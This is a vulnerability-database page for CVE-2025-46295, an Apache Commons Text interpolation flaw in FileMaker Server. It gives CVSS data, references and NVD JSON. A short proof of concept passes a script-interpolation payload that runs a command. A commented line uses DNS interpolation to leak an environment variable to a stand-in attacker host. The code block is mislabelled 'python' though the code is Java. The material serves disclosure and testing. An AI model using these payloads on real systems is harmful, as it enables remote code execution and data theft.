CVE-2025-46295

Description

Apache Commons Text versions prior to 1.10.0 included interpolation features that could be abused when applications passed untrusted input into the text-substitution API. Because some interpolators could trigger actions like executing commands or accessing external resources, an attacker could potentially achieve remote code execution. This vulnerability has been fully addressed in FileMaker Server 22.0.4.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:* - VULNERABLE

Apache Commons Text < 1.10.0

FileMaker Server < 22.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import org.apache.commons.text.StringSubstitutor;

public class CVE_2025_46295_PoC {
    public static void main(String[] args) {
        // Malicious input exploiting Apache Commons Text interpolation
        String maliciousInput = "${script:javascript:java.lang.Runtime.getRuntime().exec('calc.exe')}";
        
        // Vulnerable code - user input passed directly to StringSubstitutor
        StringSubstitutor interpolator = new StringSubstitutor();
        String result = interpolator.replace(maliciousInput);
        
        System.out.println("Result: " + result);
    }
}

// Alternative PoC using DNS interpolation for OOB testing:
// String oobPayload = "${dns:${env.USER}.attacker.com}";
// StringSubstitutor.replace(oobPayload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-46295
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-46295
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-46295/
[4] VulDB https://vuldb.com/cve/CVE-2025-46295
[5] https://support.claris.com/s/answerview?anum=000049059&language=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-46295", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:12.477", "lastModified": "2025-12-23T14:50:09.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Commons Text versions prior to 1.10.0 included interpolation features that could be abused when applications passed untrusted input into the text-substitution API. Because some interpolators could trigger actions like executing commands or accessing external resources, an attacker could potentially achieve remote code execution. This vulnerability has been fully addressed in FileMaker Server 22.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.0.4", "matchCriteriaId": "72210F6C-78D0-449C-BD0A-A175305D1F3B"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000049059&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}